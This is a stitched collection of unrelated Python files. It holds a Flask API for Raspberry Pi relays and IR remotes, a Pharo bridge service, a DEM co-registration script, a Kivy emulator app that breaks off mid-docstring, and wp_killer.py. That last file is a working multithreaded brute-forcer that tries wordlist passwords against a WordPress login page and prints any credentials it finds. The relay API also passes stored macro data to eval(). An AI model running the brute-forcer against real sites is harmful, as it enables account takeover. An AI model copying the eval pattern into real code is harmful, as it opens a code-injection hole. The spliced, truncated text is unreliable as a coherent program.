    endpoints = {}
    endpoints[url_for('api_v1_plate')] = 'plate'
    endpoints[url_for('api_v1_ir')] = 'ir'
    return jsonify(**endpoints)

@app.route('/api/v1/pause')
def pause():
    pause_time = request.args.get('time')
    if pause_time is None:
        pause_time = 1
    time.sleep(float(pause_time))
    return jsonify(status="ok")

@app.route('/api/v1/plate/')
def api_v1_plate():
    endpoints = {}
    for relay_plate in get_list_of_relay_plates():
        endpoints[url_for(
            'api_v1_plate_num',
            plate_num=relay_plate
        )] = load_relay_plate_conf(relay_plate)['name']
    return jsonify(**endpoints)

@app.route('/api/v1/plate/<int:plate_num>/')
def api_v1_plate_num(plate_num):
    try:
        relay_status = get_state_of_relays_on_plate(plate_num)
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    plate_conf = load_relay_plate_conf(plate_num)
    plate_name = request.args.get('name')
    if plate_name is None:
        plate_name = plate_conf['name']
    else:
        plate_conf['name'] = plate_name
        save_relay_plate_conf(plate_num, plate_conf)
    endpoints = {'name': plate_name}
    for relay_num, state in relay_status.items():
        endpoints[url_for(
            'api_v1_plate_num_relay_set',
            plate_num=plate_num,
            relay_num=relay_num
        )] = {
            'state': state,
            'name': plate_conf['relay_{}'.format(relay_num)]
        }
    return jsonify(**endpoints)

@app.route('/api/v1/plate/<int:plate_num>/toggleleds')
def api_v1_plate_num_toggle_leds(plate_num):
    try:
        toggle_leds_on_plate(plate_num)
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    return jsonify(status="ok")

@app.route('/api/v1/plate/<int:plate_num>/<int:relay_num>/')
@app.route('/api/v1/plate/<int:plate_num>/<int:relay_num>/<state>')
def api_v1_plate_num_relay_set(plate_num, relay_num, state=None):
    try:
        relay_status = get_state_of_relays_on_plate(plate_num)
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    if relay_num not in relay_status.keys():
        return make_response(jsonify(err="Relay is invalid"), 403)
    if state is None:
        state = request.args.get('state')
    if state not in ['off', 'on', 'toggle', None]:
        return make_response(jsonify(err="State is invalid"), 403)
    plate_conf = load_relay_plate_conf(plate_num)
    relay_name = request.args.get('name')
    if relay_name is None:
        relay_name = plate_conf['relay_{}'.format(relay_num)]
    else:
        plate_conf['relay_{}'.format(relay_num)] = relay_name
        save_relay_plate_conf(plate_num, plate_conf)
    curr_relay_state = relay_status[relay_num]
    if ((curr_relay_state == 'on' and state == 'off') or
            (curr_relay_state == 'off' and state == 'on') or
            state == 'toggle'):
        curr_relay_state = toggle_state_of_relay(plate_num, relay_num)
    return jsonify(state=curr_relay_state, name=relay_name)

@app.route('/api/v1/ir/')
def api_v1_ir():
    endpoints = {}
    endpoints[url_for('api_v1_ir_macro')] = 'macro'
    endpoints[url_for('api_v1_ir_remote')] = 'remote'
    endpoints[url_for('api_v1_irrecord_buttons')] = 'irrecord_buttons'
    return jsonify(**endpoints)

@app.route('/api/v1/ir/irrecord_buttons')
def api_v1_irrecord_buttons():
    try:
        buttons = get_list_of_buttons_for_irrecord()
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    return jsonify(buttons=buttons)

@app.route('/api/v1/ir/macro/', methods=['GET', 'PUT'])
def api_v1_ir_macro():
    if request.method == 'PUT':
        try:
            set_macro_definition(request.get_json())
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
    try:
        macrolist = get_list_of_macros()
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    macros = {}
    for macro in macrolist:
        macros[url_for(
            'api_v1_ir_macro_name',
            macro_name=macro
        )] = macro
    return jsonify(**macros)

@app.route('/api/v1/ir/macro/<macro_name>/', methods=['GET', 'POST', 'DELETE'])
@app.route('/api/v1/ir/macro/<macro_name>/<state>')
def api_v1_ir_macro_name(macro_name, state=None):
    if request.method == 'POST':
        try:
            set_macro_definition(request.get_json(), macro_name)
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
    try:
        macro = get_macro_definition(macro_name)
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    if request.method == 'DELETE':
        try:
            remove_macro_definition(macro_name)
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
        return jsonify(status="ok")
    if state is None:
        state = request.args.get('state')
    if state not in ['pressed', 'on', None]:
        return make_response(jsonify(err="State is invalid"), 403)
    if state in ['pressed', 'on']:
        for url in macro:
            func, args = flask_from_url.route_from(url)
            func = eval(func)
            func(**args)
    formatted_macro = {}
    formatted_macro[macro_name] = macro
    return jsonify(**formatted_macro)

@app.route('/api/v1/ir/remote/', methods=['GET', 'PUT'])
def api_v1_ir_remote():
    if request.method == 'PUT':
        try:
            set_remote_definition(request.get_json())
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
    try:
        remotelist = get_list_of_remotes()
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    remotes = {}
    for remote in remotelist:
        remotes[url_for(
            'api_v1_ir_remote_remote_name',
            remote=remote
        )] = remote
    return jsonify(**remotes)

@app.route('/api/v1/ir/remote/<remote>/', methods=['GET', 'POST', 'DELETE'])
def api_v1_ir_remote_remote_name(remote):
    if request.method == 'POST':
        try:
            set_remote_definition(request.get_json(), remote)
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
    try:
        buttonlist = get_list_of_remote_buttons(remote)
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    if request.method == 'DELETE':
        try:
            remove_remote_definition(remote)
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
        return jsonify(status="ok")
    buttons = {}
    for button in buttonlist:
        buttons[url_for(
            'api_v1_ir_remote_remote_button',
            remote=remote,
            button=button[0]
        )] = {'button': button[0], 'name': button[1]}
    buttons['name'] = remote
    return jsonify(**buttons)

@app.route('/api/v1/ir/remote/<remote>/<button>/')
@app.route('/api/v1/ir/remote/<remote>/<button>/<state>')
def api_v1_ir_remote_remote_button(remote, button, state=None):
    try:
        buttonlist = get_list_of_remote_buttons(remote)
    except Exception as ex:
        return make_response(jsonify(err=str(ex)), 403)
    if button not in [x[0] for x in buttonlist]:
        return make_response(jsonify(err="Button not defined"), 403)
    if state is None:
        state = request.args.get('state')
    if state not in ['pressed', 'on', None]:
        return make_response(jsonify(err="State is invalid"), 403)
    if state in ['pressed', 'on']:
        try:
            press_ir_button(remote, button)
        except Exception as ex:
            return make_response(jsonify(err=str(ex)), 403)
    button_status = {}
    for x in buttonlist:
        if x[0] == button:
            button_status['button'] = x[0]
            button_status['name'] = x[1]
    return jsonify(**button_status)

@socketio.on('start irrecord', namespace='/irrecord')
def wss_start_irrecord(message):
    start_irrecord(message['remote'])
    print(message)
    emit('irrecord output', {
        'data': 'Starting irrecord for {}'.format(
            message['remote']
        )
    })

@socketio.on('send irrecord button', namespace='/irrecord')
def wss_send_button(message):
    send_irrecord_button(message['button'])
    emit('irrecord output', {
        'data': message['button']
    })

if __name__ == '__main__':
    initial_relay_state()
    if REGISTER_ZEROCONF:
        info = ServiceInfo("_http._tcp.local.",
                           socket.gethostname() + "._http._tcp.local.",
                           address=socket.inet_aton(ZC_IP_ADDRESS), port=PORT,
                           properties={'path': '/', 'api-type': 'raspi-ir-relay'},
                           server=FQDN)
        zeroconf = Zeroconf()
        try:
            zeroconf.register_service(info)
        except Exception as ex:
            print(ex)
    socketio.run(app, host=IP_ADDRESS, port=PORT)
    if REGISTER_ZEROCONF:
        try:
            zeroconf.unregister_service(info)
            zeroconf.close()
        except Exception as ex:
            print(ex)
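A hedged usage sketch of the REST API above; the endpoint shapes come from the routes defined in this file, while the host name is an assumption:

# Toggle relay 3 on plate 0 and press a remote button, assuming the service
# is reachable at raspi.local:5000 and a remote named 'tv' has been recorded.
import requests

base = 'http://raspi.local:5000/api/v1'
print(requests.get(base + '/plate/0/3/toggle').json())  # {'state': 'on'|'off', 'name': ...}
print(requests.get(base + '/ir/remote/tv/KEY_POWER/pressed').json())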
flask_platform.py
from flask import Flask, request
import http.client
import json
import threading
from PythonBridge import bridge_globals, json_encoder, bridge_utils
import sys
import logging
import requests

class FlaskMsgService:
    def __init__(self, port, pharo_port, feed_callback):
        self.serializer = json_encoder.JsonSerializer()
        log = logging.getLogger('werkzeug')
        log.setLevel(logging.ERROR)
        self.thread = None
        self.port = port
        self.pharo_port = pharo_port
        self.feed_callback = feed_callback
        self.app = Flask('PythonBridge')
        self.session = requests.Session()
        self.session.trust_env = True

        @self.app.route("/ENQUEUE", methods=["POST"])
        def eval_expression():
            data = request.get_json(force=True)
            self.feed_callback(data)
            return "{}"

        @self.app.route("/IS_ALIVE", methods=["POST"])
        def status_endpoint():
            return "{}"

    def addMapping(self, key_type, mapping_function):
        json_encoder.addMapping(key_type, mapping_function)

    def _start(self):
        try:
            # The reloader must stay off: the server runs in a background
            # thread, and Flask's reloader only works in the main thread.
            self.app.run(port=self.port, use_reloader=False)
        except OSError as err:
            bridge_globals.logger.log('Critical Error:' + str(err))
            exit(42)

    def start(self):
        self.thread = threading.Thread(target=self._start, args=())
        self.thread.daemon = True
        self.thread.start()

    def is_running(self):
        return self.thread is not None

    def stop(self):
        pass

    def send_async_message(self, msg):
        self.send_sync_message(msg)

    def send_sync_message(self, msg):
        msg['__sync'] = bridge_utils.random_str()
        bridge_globals.logger.log("SYNC_MSG: " + json.dumps(msg))
        response = self.session.post(
            'http://localhost:' + str(self.pharo_port) + '/' + msg['type'],
            data=json.dumps(msg),
            headers={'content-type': 'application/json'},
            allow_redirects=True).content.decode('utf-8')
        bridge_globals.logger.log("SYNC_ANS: " + response)
        return json.loads(response)

def build_service(port, pharo_port, feed_callback):
    return FlaskMsgService(port, pharo_port, feed_callback)
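A minimal sketch of wiring up the service, assuming this file is importable as flask_platform and a Pharo-side listener is on port 6001; the ports and the callback are placeholders:

# Start the bridge's HTTP endpoint and hand inbound messages to a callback.
from flask_platform import build_service

def on_message(data):
    print('received from Pharo:', data)

service = build_service(5001, 6001, on_message)
service.start()  # serves /ENQUEUE and /IS_ALIVE on port 5001 in a daemon thread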
dem_coregistration.py
#!/usr/bin/env python
# Filename: dem_coregistration
"""
introduction: DEM co-registration using demcoreg; install it and its dependencies:

git clone https://github.com/dshean/imview.git
pip install -e imview
git clone https://github.com/dshean/pygeotools.git
pip install -e pygeotools
git clone https://github.com/dshean/demcoreg.git
pip install -e demcoreg

authors: Huang Lingcao
email: huanglingcao@gmail.com
add time: 01 March, 2021
"""

import os, sys
from optparse import OptionParser

deeplabforRS = os.path.expanduser('~/codes/PycharmProjects/DeeplabforRS')
sys.path.insert(0, deeplabforRS)

import basic_src.io_function as io_function
import basic_src.basic as basic
import raster_io

from multiprocessing import Process

dem_dem_align = os.path.expanduser('~/codes/github_public_repositories/demcoreg/demcoreg/dem_align.py')

# use psutil to check available memory.
import psutil
import time

# check the resources used by python
# import resource
# resource.getrusage(resource.RUSAGE_SELF)

def choose_reference_dem(dem_list, dem_valid_per_txt):
    if dem_valid_per_txt is None:
        raise ValueError('NO information on the valid percentage of DEMs, cannot choose a reference DEM')
    with open(dem_valid_per_txt, 'r') as f_obj:
        tif_valid_per_list = [line.strip().split() for line in f_obj.readlines()]

    tif_highest_per = None
    per_max = 0
    for tif, per in tif_valid_per_list:
        if float(per) > per_max:
            per_max = float(per)
            tif_highest_per = tif

    for dem_tif in dem_list:
        if tif_highest_per in dem_tif:
            return dem_tif
    return None

def check_coreg_results(dem_tif, save_dir):
    dem_align = os.path.join(save_dir, 'dem_coreg',
                             os.path.basename(io_function.get_name_by_adding_tail(dem_tif, 'coreg')))
    if os.path.isfile(dem_align):
        return True
    return False

def check_align_folder(dem_tif):
    # by default, dem_align.py saves the results to where dem_tif is
    res_dir = os.path.dirname(dem_tif)
    align_folder = os.path.splitext(os.path.basename(dem_tif))[0] + '_dem_align'
    align_dir = os.path.join(res_dir, align_folder)
    # after dem_align.py, there usually are 9 files
    align_outputs = io_function.get_file_list_by_pattern(align_dir, '*')
    # print(align_outputs)
    return align_outputs

def move_align_results(ref_dem, dem_tif, save_dir):
    coreg_save_dir = os.path.join(save_dir, 'dem_coreg')
    if os.path.isdir(coreg_save_dir) is False:
        io_function.mkdir(coreg_save_dir)
    align_outputs = check_align_folder(dem_tif)
    if len(align_outputs) < 9:
        raise ValueError('the output of dem_align.py is less than 9 files')

    dem_align = os.path.join(coreg_save_dir,
                             os.path.basename(io_function.get_name_by_adding_tail(dem_tif, 'coreg')))

    # align DEM and a filt version: which one should we use, and what filter do they apply?
    # visually checked one result (Banks east): at the same location, the align DEM and the
    # filt one have exactly the same values, but the filt version has more nodata.
    # Let's use the filt version. The nodata pixels usually are water pixels,
    # but some are also inside the thaw slumps.
    align_filt = [out for out in align_outputs if out.endswith('align_filt.tif')][0]
    io_function.move_file_to_dst(align_filt, dem_align, overwrite=True)

    # copy the reference DEM if necessary
    ref_dem_copy = os.path.join(coreg_save_dir, os.path.basename(ref_dem))
    if os.path.isfile(ref_dem_copy) is False:
        io_function.copy_file_to_dst(ref_dem, ref_dem_copy)

    # move the elevation difference
    ele_diff_folder = os.path.join(save_dir, 'dem_diff_from_demcoreg')
    if os.path.isdir(ele_diff_folder) is False:
        io_function.mkdir(ele_diff_folder)
    dem_diff_filt = [out for out in align_outputs if out.endswith('align_diff_filt.tif')][0]
    io_function.movefiletodir(dem_diff_filt, ele_diff_folder, overwrite=True)

    coreg_png_plot_folder = os.path.join(save_dir, 'demcoreg_png_plot')
    if os.path.isdir(coreg_png_plot_folder) is False:
        io_function.mkdir(coreg_png_plot_folder)
    coreg_pngs = [out for out in align_outputs if out.endswith('.png')]
    for png in coreg_pngs:
        io_function.movefiletodir(png, coreg_png_plot_folder, overwrite=True)

    return True

# def co_registration_parallel(ref_dem, dem_list, save_dir, process_num):
#     print('ref_dem', ref_dem)
#     print('source dem:')
#     for dem_tif in dem_list:
#         print(dem_tif)
#
#     # dem_align.py requires large memory; for example, a region of 50000 by 50000 pixels
#     # may require more than 110 GB of memory.
#     # parallel --progress --delay 10 -j 14 dem_align.py ${ref} {} ::: $(ls *_dem.tif | grep -v 2012)
#     commond_str = 'parallel --progress --delay 5 -j %d %s %s' % (process_num, dem_dem_align, ref_dem)
#     commond_str += ' {} ::: ' + ' '.join(dem_list)
#     print(commond_str)
#     os.system(commond_str)
#     # move results to another folder

def co_registration_one_dem(ref_dem, dem_tif, save_dir):
    if check_coreg_results(dem_tif, save_dir):
        basic.outputlogMessage('co-registration results for %s exist, skip' % dem_tif)
        return 0
    align_outputs = check_align_folder(dem_tif)
    if len(align_outputs) >= 9:
        basic.outputlogMessage('%s has been co-registered, skip' % dem_tif)
    else:
        commond_str = dem_dem_align + ' ' + ref_dem + ' ' + dem_tif
        basic.outputlogMessage(commond_str)
        res = os.system(commond_str)
        if res != 0:
            sys.exit(1)
    return move_align_results(ref_dem, dem_tif, save_dir)

def co_registration_multi_process(ref_dem, dem_list, save_dir, process_num):
    print('ref_dem', ref_dem)
    print('source dem:')
    for dem_tif in dem_list:
        print(dem_tif)

    sub_tasks = []
    for dem_tif in dem_list:
        height, width, band_num, data_type = raster_io.get_height_width_bandnum_dtype(dem_tif)
        # estimate the memory needed: usually each pixel needs 4 bytes (float),
        # and dem_align.py needs more than 12 times the file size
        need_memory = height * width * 4 * 12
        avai_memory = psutil.virtual_memory().available
        while need_memory > avai_memory:
            print('waiting for more available memory, need: %.4f GB, available: %.4f GB' %
                  (need_memory / (1000 * 1000 * 1000), avai_memory / (1000 * 1000 * 1000)))
            time.sleep(10)
            avai_memory = psutil.virtual_memory().available

        while basic.alive_process_count(sub_tasks) >= process_num:
            time.sleep(10)

        sub_process = Process(target=co_registration_one_dem, args=(ref_dem, dem_tif, save_dir))
        sub_process.start()
        sub_tasks.append(sub_process)
        time.sleep(1)
        if sub_process.exitcode is None:
            # even after the function has returned, the subprocess can still be alive for now
            time.sleep(10)  # wait 10 seconds
        if sub_process.exitcode is not None and sub_process.exitcode != 0:
            sys.exit(1)

def main(options, args):
    save_dir = options.save_dir
    dem_dir_or_txt = args[0]
    ref_dem = options.ref_dem
    dem_valid_per_txt = options.dem_valid_per_txt
    process_num = options.process_num

    if os.path.isfile(dem_dir_or_txt):
        dem_list = io_function.read_list_from_txt(dem_dir_or_txt)
    else:
        dem_list = io_function.get_file_list_by_ext('.tif', dem_dir_or_txt, bsub_folder=False)
        if dem_valid_per_txt is None:
            dem_valid_per_txt = os.path.join(dem_dir_or_txt, 'dem_valid_percent.txt')

    dem_count = len(dem_list)
    if dem_count < 1:
        raise ValueError('No input dem files in %s' % dem_dir_or_txt)

    if ref_dem is None:
        ref_dem = choose_reference_dem(dem_list, dem_valid_per_txt)
        if ref_dem is None:
            raise ValueError('Cannot find a reference DEM')
    if ref_dem in dem_list:
        dem_list.remove(ref_dem)

    # co_registration_parallel(ref_dem, dem_list, save_dir, process_num)
    co_registration_multi_process(ref_dem, dem_list, save_dir, process_num)

if __name__ == '__main__':
    usage = "usage: %prog [options] dem_tif_dir or dem_list_txt "
    parser = OptionParser(usage=usage, version="1.0 2020-3-1")
    parser.description = 'Introduction: co-registration for multi-temporal DEMs '

    parser.add_option("-d", "--save_dir",
                      action="store", dest="save_dir", default='./',
                      help="the folder to save results")

    parser.add_option("", "--process_num",
                      action="store", dest="process_num", type=int, default=4,
                      help="number of processes")

    parser.add_option("-r", "--ref_dem",
                      action="store", dest="ref_dem",
                      help="the reference DEM; if not set, it will select the one with the most coverage")

    parser.add_option("-p", "--dem_valid_per_txt",
                      action="store", dest="dem_valid_per_txt",
                      help="a txt file storing the valid percentage of all the DEMs")

    (options, args) = parser.parse_args()
    # print(options.create_mosaic)
    if len(sys.argv) < 2 or len(args) < 1:
        parser.print_help()
        sys.exit(2)

    main(options, args)
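The memory gate in co_registration_multi_process follows a simple rule of thumb; a quick sanity check of that estimate, using the 4-byte pixel size and the 12x overhead stated in the code above:

# Back-of-envelope check of the memory rule for a 50000 x 50000 DEM.
height, width = 50000, 50000
need_gb = height * width * 4 * 12 / (1000 * 1000 * 1000)
print('estimated need: %.1f GB' % need_gb)  # 120.0 GB, in line with the ~110 GB note above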
wp_killer.py
from bhp3_class.web import get_words
from collections import deque
from io import BytesIO
from lxml import etree
import requests
import sys
import threading
import time

EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
SUCCESS = 'Welcome to WordPress!'
WORDLIST = '/mydownloads/cain.txt'

def get_params(content):
    params = dict()
    parser = etree.HTMLParser()
    tree = etree.parse(BytesIO(content), parser=parser)
    for elem in tree.findall('//input'):
        name = elem.get('name')
        if name:
            params[name] = elem.get('value', None)
    return params

class Bruter:
    def __init__(self, username, url):
        self.username = username
        self.url = url
        self.found = False
        print(f'\nBrute Force Attack beginning on {url}.\n')
        print("Finished setup; username = %s\n" % username)

    def run_bruteforce(self, passwords):
        for _ in range(10):
            t = threading.Thread(target=self.web_bruter, args=(passwords,))
            t.start()

    def web_bruter(self, passwords):
        session = requests.Session()
        # Loop until a match is found, so that sibling threads also stop
        # once self.found is set.
        while not self.found:
            time.sleep(5)
            try:
                brute = passwords.popleft()
            except IndexError:
                print('Thread quits with no match.')
                sys.exit()

            print(f'Trying username/password {self.username}/{brute:<10}')
            resp0 = session.get(self.url)
            params = get_params(resp0.content)
            params['log'] = self.username
            params['pwd'] = brute

            resp1 = session.post(self.url, data=params)
            if SUCCESS in resp1.content.decode():
                self.found = True
                print("\nBruteforcing successful.")
                print("Username is %s" % self.username)
                print("Password is %s\n" % brute)
                passwords.clear()
                print('done: now cleaning up.')

if __name__ == '__main__':
    username = input('Enter username: ')
    url = input("input WP url: ")
    words = get_words(WORDLIST)
    b = Bruter(username, url)
    b.run_bruteforce(deque(words))
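A quick check of get_params on a canned login form, assuming this file is importable as wp_killer; the HTML is a stand-in for a real wp-login.php page:

# Extract the named form inputs from a minimal HTML snippet.
from wp_killer import get_params

html = (b'<form><input name="log" value=""/><input name="pwd" value=""/>'
        b'<input type="hidden" name="testcookie" value="1"/></form>')
print(get_params(html))  # {'log': '', 'pwd': '', 'testcookie': '1'}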
main.py
import os
import sys

# os.system('set DEBUG=1')
# print("setting debugger to true for auto reload")
from kivy.storage.jsonstore import JsonStore
from kivy.uix.button import Button
from kivy.uix.image import AsyncImage
from kivy.uix.scrollview import ScrollView
from kivymd.list import MDList, OneLineAvatarIconListItem, ILeftBody

original_argv = sys.argv

import traceback
from fnmatch import fnmatch
from functools import partial
from importlib import reload
from logging import Logger
from os.path import join, realpath
from threading import Thread

from kivy.app import App
from kivy.clock import mainthread, Clock
from kivy.core.window import Window
from kivy.factory import Factory
from kivy.lang import Builder
from kivy.properties import ObjectProperty, NumericProperty, StringProperty, ListProperty
from kivy.resources import resource_add_path, resource_remove_path
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.screenmanager import Screen
from monotonic import monotonic
from kivymd.theming import ThemeManager
from plyer import filechooser

BASE_DIR = os.path.realpath(__file__)
json_path = BASE_DIR.split("\\")[:-1]
history_path = os.path.join("\\".join(json_path), "history.json")

class EmulatorScreen(Screen):
    pass

class AvatarSampleWidget(ILeftBody, AsyncImage):
    pass

class HistoryItem(OneLineAvatarIconListItem):
    def __init__(self, **kwargs):
        super(HistoryItem, self).__init__(**kwargs)

    def on_press(self):
        print("yeah", self.text)
        App.get_running_app().filename = self.text
        App.get_running_app().theme_cls.theme_style = 'Light'
        Window.size = (300, 650)
        Window.borderless = True
        App.get_running_app().clear()
        App.get_running_app().root.ids.screen_manager.current = "emulator_screen"

class HistoryScreen(Screen):
    def build_screen(self):
        history = JsonStore(history_path)
        scrollview = ScrollView(do_scroll_x=False)
        md_list = MDList()
        scrollview.add_widget(md_list)
        for i in history.keys():
            item = HistoryItem(text=str(i))
            item.add_widget(AvatarSampleWidget(source="./assets/kivy-icon-128.png"))
            md_list.add_widget(item)
        print("building screen for history")
        self.add_widget(scrollview)

class EmuInterface(FloatLayout):
    pass

def toast(text):
    from kivymd.toast.kivytoast import toast
    toast(text)

class KivyEmu(App):
    theme_cls = ThemeManager()
    theme_cls.primary_palette = 'Indigo'
    theme_cls.accent_palette = 'Indigo'
    theme_cls.theme_style = 'Dark'
    Window.size = (300, 650)
    filename = None
    class_name = None
    selection = ListProperty([])
    bs_menu_1 = None
    # reloader = ReloaderApp()

    AUTORELOADER_PATHS = [
        (".", {"recursive": True}),
    ]
    AUTORELOADER_IGNORE_PATTERNS = [
        "*.pyc", "*__pycache__*"
    ]
    KV_FILES = []
    CLASSES = {}

    def get_root(self):
        """
        Return a root widget that will contain your application.
        It should not be your application widget itself, as it may be
        destroyed and recreated from scratch when reloading.

        By default, it returns a RelativeLayout, but it could be a Viewport.
        """
        return Factory.RelativeLayout()

    def build_app(self, first=False):
        """Must return your application widget.

        If `first` is set, it means that this will be the first time ever
        that the application is built. Act accordingly.
        """
        raise NotImplementedError()

    def unload_app_dependencies(self):
        """
        Called when all the application dependencies must be unloaded.
        Usually happens before a reload.
        """
        for path in self.KV_FILES:
            path = realpath(path)
            Builder.unload_file(path)
        for name, module in self.CLASSES.items():
            Factory.unregister(name)

    def load_app_dependencies(self):
        """
        Load all the application dependencies.
        This is called before rebuild.
        """
        for path in self.KV_FILES:
            path = realpath(path)
            Builder.load_file(path)
        for name, module in self.CLASSES.items():
            Factory.register(name, module=module)

    def rebuild(self, *largs, **kwargs):
        print("rebuilding application")
        self.emulate_file(self.filename)
        print("done reloading")
        # Logger.debug("{}: Rebuild the application".format(self.appname))
        # first = kwargs.get("first", False)
        # try:
        #     if not first:
        #         self.unload_app_dependencies()
        #     self.load_app_dependencies()
        #     self.set_widget(None)
        #     # self.start_emulation()
        # except Exception as e:
        #     pass
        #     self.approot = self.build_app()
        #     # self.root.ids.emulator_screen =
        #     self.set_widget(self.approot)
        #     self.apply_state(self.state)
        # except Exception as e:
        #     import traceback
        #     Logger.exception("{}: Error when building app".format(self.appname))
        #     self.set_error(repr(e), traceback.format_exc())
        #     if not self.DEBUG and self.RAISE_ERROR:
        #         raise

    @mainthread
    def set_error(self, exc, tb=None):
        print(tb)
        from kivy.core.window import Window
        lbl = Factory.Label(
            text_size=(Window.width - 100, None),
            text="{}\n\n{}".format(exc, tb or ""))
        self.set_widget(lbl)

    def bind_key(self, key, callback):
        """
        Bind a key (keycode) to a callback (cannot be unbound).
        """
        from kivy.core.window import Window

        def _on_keyboard(window, keycode, *largs):
            if key == keycode:
                return callback()

        Window.bind(on_keyboard=_on_keyboard)

    @property
    def appname(self):
        """
        Return the name of the application class.
        """
        return self.__class__.__name__

    def enable_autoreload(self):
        """
        Enable autoreload manually. It is activated automatically
        if "DEBUG" exists in environ. It requires the `watchdog` module.
        """
        try:
            from watchdog.observers import Observer
            from watchdog.events import FileSystemEventHandler
        except ImportError:
            Logger.warn("{}: Autoreloader is missing watchdog".format(self.appname))
            return
        # Logger.info("Autoreloader activated")
        print("Autoreload activated")
        rootpath = self.get_root_path()
        # print("this is the root path", rootpath)
        self.w_handler = handler = FileSystemEventHandler()
        handler.dispatch = self._reload_from_watchdog
        self._observer = observer = Observer()
        for path in self.AUTORELOADER_PATHS:
            # print(path, "paths dey")
            options = {"recursive": True}
            if isinstance(path, (tuple, list)):
                # print("iii")
                path, options = path
            observer.schedule(
                handler, join(rootpath, path), **options)
        observer.start()

    @mainthread
    def _reload_from_watchdog(self, event):
        from watchdog.events import FileModifiedEvent
        if not isinstance(event, FileModifiedEvent):
            return

        for pat in self.AUTORELOADER_IGNORE_PATTERNS:
            if fnmatch(event.src_path, pat):
                return

        if event.src_path.endswith(".py"):
            # source changed, reload it
            try:
                Builder.unload_file(event.src_path)
                self._reload_py(event.src_path)
            except Exception as e:
                import traceback
                self.set_error(repr(e), traceback.format_exc())
                return

        if event.src_path.endswith(".kv"):
            origin = str(event.src_path).split('.')
            main_path = str(event.src_path).split('\\')[:-1]
            main_path = "\\".join(main_path)
            print(main_path)
            if 'main.py' in os.listdir(main_path):
                new_path = os.path.join(main_path, 'main.py')
                try:
                    Builder.unload_file(new_path)
                    self._reload_py(new_path)
                except Exception as e:
                    import traceback
                    self.set_error(repr(e), traceback.format_exc())
                    return

        print("reload cause of", event)
        print(event.src_path, "this is the file that caused the reload")
        print(self.filename, "this is the original filename")
        Clock.unschedule(self.rebuild)
        Clock.schedule_once(self.rebuild, 0.1)

    def _reload_py(self, filename):
        # we don't have a dependency graph yet, so if the module actually
        # exists, reload it.
        filename = realpath(filename)
        print("filename from realpath")

        # check if it's our own application file
        try:
            mod = sys.modules[self.__class__.__module__]
            mod_filename = realpath(mod.__file__)
        except Exception as e:
            mod_filename = None

        # detect if it's the application class // main
        if mod_filename == filename:
            return self._restart_app(mod)

        module = self._filename_to_module(filename)
        if module in sys.modules:
            Logger.debug("{}: Module exists, reload it".format(self.appname))
            Factory.unregister_from_filename(filename)
            self._unregister_factory_from_module(module)
            reload(sys.modules[module])

    def _unregister_factory_from_module(self, module):
        # check module directly
        to_remove = [
            x for x in Factory.classes
            if Factory.classes[x]["module"] == module]
        # check class name
        for x in Factory.classes:
            cls = Factory.classes[x]["cls"]
            if not cls:
                continue
            if getattr(cls, "__module__", None) == module:
                to_remove.append(x)
        for name in set(to_remove):
            del Factory.classes[name]

    def _filename_to_module(self, filename):
        orig_filename = filename
        rootpath = self.get_root_path()
        if filename.startswith(rootpath):
            filename = filename[len(rootpath):]
        if filename.startswith("/"):
            filename = filename[1:]
        module = filename[:-3].replace("/", ".")
        print("translated to", orig_filename, module)
        # Logger.debug("{}: Translated {} to {}".format(self.appname, orig_filename, module))
        return module

    def _restart_app(self, mod):
        _has_execv = sys.platform != 'win32'
        cmd = [sys.executable] + original_argv
        if not _has_execv:
            import subprocess
            subprocess.Popen(cmd)
            sys.exit(0)
        else:
            try:
                os.execv(sys.executable, cmd)
            except OSError:
                os.spawnv(os.P_NOWAIT, sys.executable, cmd)
                os._exit(0)

    def prepare_foreground_lock(self):
        """
        Try forcing the app to front permanently to avoid Windows
        pop ups, notifications, etc.

        Requires fake fullscreen and borderless.

        .. note::
            This function is called automatically if `FOREGROUND_LOCK` is set
        """
        try:
            import ctypes
            LSFW_LOCK = 1
            ctypes.windll.user32.LockSetForegroundWindow(LSFW_LOCK)
            Logger.info("App: Foreground lock activated")
        except Exception:
            Logger.warn("App: No foreground lock available")

    def set_widget(self, wid):
        """
        Clear the root container, and set the new approot widget to `wid`.
        """
        self.root.clear_widgets()
        self.approot = wid
        if wid is None:
            return
        self.root.add_widget(self.approot)
        try:
            wid.do_layout()
        except Exception:
            pass

    def get_root_path(self):
        """
        Return the root file path.
        """
        return realpath(os.getcwd())

    # State management
    def apply_state(self, state):
        """Whatever the current state is, reapply the current state.
        """
        pass

    # Idle management
    def install_idle(self, timeout=60):
        """
        Install the idle detector. The default timeout is 60s.
        Once installed, it will check every second whether the idle timer
        has expired. The timer can be rearmed using :func:`rearm_idle`.
